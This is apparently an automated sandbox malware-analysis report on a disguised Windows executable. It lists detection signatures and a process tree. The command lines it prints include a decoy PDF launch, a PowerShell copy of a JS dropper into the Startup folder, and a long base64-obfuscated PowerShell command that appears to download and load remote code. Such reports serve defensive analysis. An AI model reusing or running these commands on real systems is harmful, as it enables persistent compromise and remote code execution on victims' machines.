Edit tour
Windows
Analysis Report
copyright_infringement_evidence_1.exe
Overview
General Information
| Sample name: | copyright_infringement_evidence_1.exe |
| Analysis ID: | 1528568 |
| MD5: | 8c04e5d5adaf15173fecd9384ceda14d |
| SHA1: | 9cbcf5134cfecb1a1f0c7e615a2a973ed8381e54 |
| SHA256: | 31599bbf15939b4fbc91a6e228b436abfef3a213ece4d92cc6d8c90c905528ad |
| Tags: | exeXiamenHuixiantongNetworkTechnologyCoLtduser-SquiblydooBlog |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Drops script or batch files to the startup folder
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
copyright_infringement_evidence_1.exe (PID: 6572 cmdline: "C:\Users\ user\Deskt op\copyrig ht_infring ement_evid ence_1.exe " MD5: 8C04E5D5ADAF15173FECD9384CEDA14D) 
cmd.exe (PID: 5036 cmdline: "cmd" /C s tart C:\Us ers\Public \Documents \Benefits- _JD-_Photo -_Video-_U NQILO-_Q4- _2024_Bene fits-_JD-_ Photo.pdf MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 616 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
Acrobat.exe (PID: 2676 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\Publ ic\Documen ts\Benefit s-_JD-_Pho to-_Video- _UNQILO-_Q 4-_2024_Be nefits-_JD -_Photo.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) 
AcroCEF.exe (PID: 6008 cmdline: "C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 1716 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 08 --field -trial-han dle=1636,i ,223878932 5032490654 ,130573715 3195961112 2,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) 
wscript.exe (PID: 7404 cmdline: "wscript.e xe" C:\Use rs\Public\ Documents\ 2p_bee.js MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7956 cmdline:
"C:\Window s\System32 \cmd.exe" /c ping 12 7.0.0.1 -n 10 & powe rshell -co mmand [Sys tem.IO.Fil e]::Copy(' C:\Users\P ublic\Docu ments\2p_b ee.js', 'C :\Users\' + [Environ ment]::Use rName + '' \AppData\R oaming\Mic rosoft\Win dows\Start Menu\Prog rams\Start up\ sj.JJC .js')') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7968 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
PING.EXE (PID: 8024 cmdline: ping 127.0 .0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) 
powershell.exe (PID: 6688 cmdline: powershell -command [System.IO .File]::Co py('C:\Use rs\Public\ Documents\ 2p_bee.js' , 'C:\User s\' + [Env ironment]: :UserName + ''\AppDa ta\Roaming \Microsoft \Windows\S tart Menu\ Programs\S tartup\ sj .JJC.js')' ) MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 7320 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LgAoACAAJA BlAE4AdgA6 AGMATwBNAF MAUABFAGMA WwA0ACwAMQ A1ACwAMgA1 AF0ALQBKAG 8ASQBOACcA JwApACgAIA AoACgAJwB7 ADIAfQB1AH IAbAAgAD0A IAB7ADAAJw ArACcAfQBo AHQAdAAnAC sAJwBwAHMA OgAvAC8Acg BhAHcALgAn ACsAJwBnAG kAdABoACcA KwAnAHUAJw ArACcAYgB1 AHMAZQByAC cAKwAnAGMA bwBuAHQAJw ArACcAZQBu AHQALgBjAG 8AJwArACcA bQAvAE4AJw ArACcAbwBE AGUAdABlAG MAJwArACcA dABPACcAKw AnAG4ALwBO AG8ARABlAC cAKwAnAHQA ZQBjAHQATw BuAC8AJwAr ACcAcgAnAC sAJwBlACcA KwAnAGYAJw ArACcAcwAv ACcAKwAnAG gAZQAnACsA JwBhAGQAcw AvAG0AYQBp AG4ALwBEAC cAKwAnAGUA dAAnACsAJw BhAGgATgBv AHQAZQBfAE oALgB0AHgA dAAnACsAJw B7ADAAfQAn ACsAJwA7AC AAJwArACcA ewAnACsAJw AyAH0AYgBh AHMAJwArAC cAZQA2ADQA QwBvACcAKw AnAG4AJwAr ACcAdABlAG 4AJwArACcA dAAgAD0AIA AoAE4AZQB3 AC0ATwBiAG oAZQBjAHQA JwArACcAIA BTACcAKwAn AHkAcwB0AC cAKwAnAGUA bQAnACsAJw AuAE4AZQB0 ACcAKwAnAC 4AVwAnACsA JwBlACcAKw AnAGIAJwAr ACcAQwBsAG kAZQAnACsA JwBuACcAKw AnAHQAJwAr ACcAKQAuAC cAKwAnAEQA JwArACcAbw B3AG4AbABv ACcAKwAnAG EAJwArACcA ZABTAHQAJw ArACcAcgAn ACsAJwBpAC cAKwAnAG4A ZwAnACsAJw AoAHsAJwAr ACcAMgB9AH UAcgBsACkA OwAgACcAKw AnAHsAMgB9 AGIAaQAnAC sAJwBuAGEA JwArACcAcg B5AEMAbwBu ACcAKwAnAH QAZQBuAHQA IAA9ACAAWw BTACcAKwAn AHkAcwB0AG UAbQAuACcA KwAnAEMAbw BuAHYAZQBy ACcAKwAnAH QAXQA6ACcA KwAnADoARg ByACcAKwAn AG8AJwArAC cAbQBCAGEA cwBlADYANA BTAHQAcgBp AG4AZwAoAH sAMgB9AGIA YQAnACsAJw BzAGUANgA0 ACcAKwAnAE MAJwArACcA bwBuAHQAJw ArACcAZQBu AHQAKQAnAC sAJwA7ACcA KwAnACAAew AyAH0AJwAr ACcAYQBzAH MAZQAnACsA JwBtACcAKw AnAGIAJwAr ACcAbAB5AC AAJwArACcA PQAgAFsAUg BlAGYAJwAr ACcAbABlAC cAKwAnAGMA JwArACcAdA BpACcAKwAn AG8AbgAuAE EAcwBzAGUA bQBiACcAKw AnAGwAeQBd ADoAOgBMAC cAKwAnAG8A YQAnACsAJw BkACcAKwAn ACgAewAnAC sAJwAyAH0A YgBpAG4AYQ AnACsAJwBy AHkAJwArAC cAQwAnACsA JwBvAG4AdA BlAG4AdAAp ADsAIAB7AD IAfQAnACsA JwBjACcAKw AnAG8AbQBt AGEAJwArAC cAbgAnACsA JwBkACAAPQ AnACsAJwAg AHsAMAB9AF sAJwArACcA ZABuAGwAaQ BiAC4AJwAr ACcASQBPAC 4ASABvAG0A ZQBdADoAOg AnACsAJwBW ACcAKwAnAE EASQAoACcA KwAnAHsAJw ArACcAMwAn ACsAJwB9AD AALwAnACsA JwBLACcAKw AnAFMAQQBj ACcAKwAnAE YAJwArACcA LwBkACcAKw AnAC8AZQBl AC4AJwArAC cAZQB0ACcA KwAnAHMAJw ArACcAYQAn ACsAJwBwAC 8ALwA6AHMA cAB0ACcAKw AnAHQAaAAn ACsAJwB7AD MAfQAnACsA JwAsACAAew AzAH0AMQAn ACsAJwB7AD MAfQAnACsA JwAsACAAew AzACcAKwAn AH0AJwArAC cAQwA6ACcA KwAnAHsAJw ArACcAMQAn ACsAJwB9AF AAcgBvACcA KwAnAGcAcg AnACsAJwBh AG0ARAAnAC sAJwBhACcA KwAnAHQAJw ArACcAYQB7 ADEAJwArAC cAfQB7ACcA KwAnADMAfQ AsACAAewAn ACsAJwAzAC cAKwAnAH0A JwArACcAcg BhACcAKwAn AGoAYQBkAG 8AJwArACcA ewAzACcAKw AnAH0ALAAg ACcAKwAnAH sAMwB9AEEA ZAAnACsAJw BkACcAKwAn AEkAbgBQAC cAKwAnAHIA bwBjAGUAcw BzADMAMgB7 ADMAfQAsAC cAKwAnACAA ewAzACcAKw